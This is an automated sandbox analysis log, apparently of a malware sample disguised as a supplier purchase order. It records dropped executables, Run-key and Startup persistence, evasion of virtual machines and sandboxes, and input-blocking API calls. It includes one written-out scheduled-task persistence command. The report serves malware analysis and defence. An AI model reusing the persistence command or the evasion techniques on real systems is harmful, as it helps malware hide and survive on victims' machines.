                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                                Source: QHCPYO.lnk.1.dr LNK file: ..\..\..\..\..\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\PhFjRSA.ini
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                                Source: New PO - Supplier 0202AW-PER2.exe Static file information: File size 1684992 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_010020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_010020B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF020C pushfd ; retf 1_2_00EF0215
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00F0C6CC push esi; ret 1_2_00F0C6CE
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00ECCB5D push edi; ret 1_2_00ECCB5F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00ECCC76 push esi; ret 1_2_00ECCC78
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00ECCE51 push esi; ret 1_2_00ECCE53
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00ECCF3A push edi; ret 1_2_00ECCF3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EC7795 push ecx; ret 1_2_00EC77A8
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EEBB9D push FFFFFF8Bh; iretd 1_2_00EEBB9F
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC26EC5 pushad ; retn 002Fh 2_2_2FC26EC6
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC255D0 push esi; retn 002Fh 2_2_2FC255DE
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC2FEEC push 00DC76FBh; ret 2_2_2FC2FEF2
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC248FF push ebp; retn 002Fh 2_2_2FC2491A
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC24EFD push esi; retn 002Fh 2_2_2FC255DE
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 2_2_2FC25C9D push eax; retn 002Fh 2_2_2FC25C9E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000C020C pushfd ; retf 9_2_000C0215
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000DC6CC push esi; ret 9_2_000DC6CE
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_0009CB5D push edi; ret 9_2_0009CB5F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_0009CC76 push esi; ret 9_2_0009CC78
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_0009CE51 push esi; ret 9_2_0009CE53
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_0009CF3A push edi; ret 9_2_0009CF3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_00097795 push ecx; ret 9_2_000977A8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000BBB9D push FFFFFF8Bh; iretd 9_2_000BBB9F
                                Source: initial sample Static PE information: section name: UPX0
                                Source: initial sample Static PE information: section name: UPX1

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\~$cache1
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File created: C:\ProgramData\Synaptics\RCX76FB.tmp
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe File created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe

                                Boot Survival

                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QHCPYO

                                Hooking and other Techniques for Hiding and Protection

                                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00EBF78E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F07F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00F07F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0008F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_000D7F0E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC1E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Window / User API: threadDelayed 9994
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Window / User API: foregroundWindowGot 1591
                                Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 2326
                                Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 7628
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe API coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe API coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe TID: 4304 Thread sleep time: -99940s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7236 Thread sleep time: -7740000s >= -30000s
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\splwow64.exe Last function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Thread sleep count: Count: 9994 delay: -10
                                Source: Yara match File source: 00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: wscript.exe PID: 3704, type: MEMORYSTR
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBDD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00EBDD92
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF2044
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF219F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EF24A9
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00EE6B3F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00EE6E4A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EEF350
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00EEFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFD47 FindFirstFileW,FindClose,1_2_00EEFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C2044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000C24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_000B6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_000B6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000BF350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFD47 FindFirstFileW,FindClose,9_2_000BFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0008DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_000BFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00EBE47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                                Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000
                                Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData
                                Source: Amcache.hve.21.drBinary or memory string: VMware
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.21.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.21.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.21.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.21.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnN
                                Source: Amcache.hve.21.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: Amcache.hve.21.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: Amcache.hve.21.drBinary or memory string: vmci.sys
                                Source: Amcache.hve.21.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: NUHORT.exe, 00000011.00000003.2316979785.0000000001086000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\rV<
                                Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.21.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: NUHORT.exe, 0000001B.00000003.3503230187.00000000017E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.21.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.21.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.21.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual RAM
                                Source: NUHORT.exe, 00000009.00000003.1781576330.00000000017FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\NA
                                Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.21.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-107410
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-109902
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-110716
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Process information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF703C BlockInput,1_2_00EF703C
